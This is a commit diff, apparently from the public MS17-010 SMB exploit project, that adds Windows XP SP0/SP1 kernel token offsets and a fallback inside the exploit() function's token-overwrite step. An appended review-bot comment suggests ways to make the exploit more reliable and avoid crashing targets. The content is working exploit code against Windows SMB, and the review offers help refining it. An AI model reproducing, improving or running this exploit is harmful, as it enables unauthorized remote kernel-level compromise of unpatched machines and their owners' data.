fix offsets on XP SP0 and SP1

This commit is contained in:
zerosum0x0
2018-01-29 18:32:20 -07:00
parent 20301cc5a9
commit 078d156a0d
2 changed files with 65 additions and 55 deletions

BIN
mysmb.pyc Normal file

Binary file not shown.


@@ -154,6 +154,8 @@ WINXP_32_SESSION_INFO = {
'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1': 0x40,
'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1': 0x5c
}
WIN2K_32_SESSION_INFO = {
@@ -867,6 +869,14 @@ def exploit(target, pipe_name):
userAndGroupCount = unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
# hack to fix XP SP0 and SP1
if info['os'] == 'WINXP' and info['arch'] == 'x86':
if userAndGroupCount > 4:
print("Bad TOKEN offsets detected, performing workaround")
userAndGroupCount = unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'])[0]
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'])[0]
print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount))
print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr))
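Review bot: The `if userAndGroupCount > 4` test that triggers the workaround is a guess about the value rather than a check of the target's service pack, so an SP2/SP3 session token that happens to carry more than four groups would be re-read through the SP0/SP1 offsets, and the token overwrite that follows would then target the wrong kernel memory, most likely a BSOD instead of a clean failure. If the negotiated OS/LanMan string or build number is already available in `info`, gate the fallback on that; otherwise at least validate the second read and abort when both layouts look wrong, e.g. `if userAndGroupCount > 4 or userAndGroupsAddr == 0:` followed by `print('Unrecognised TOKEN layout, aborting'); return`. The comment `# hack to fix XP SP0 and SP1` should also say why both offsets move by the same 0xc (`0x4c`→`0x40`, `0x68`→`0x5c`), e.g. `# XP SP0/SP1 TOKEN fields sit 0xc bytes earlier than on SP2+ (presumably a smaller header), so the SP2+ offsets read garbage there`. exploit() starts and continues outside this hunk.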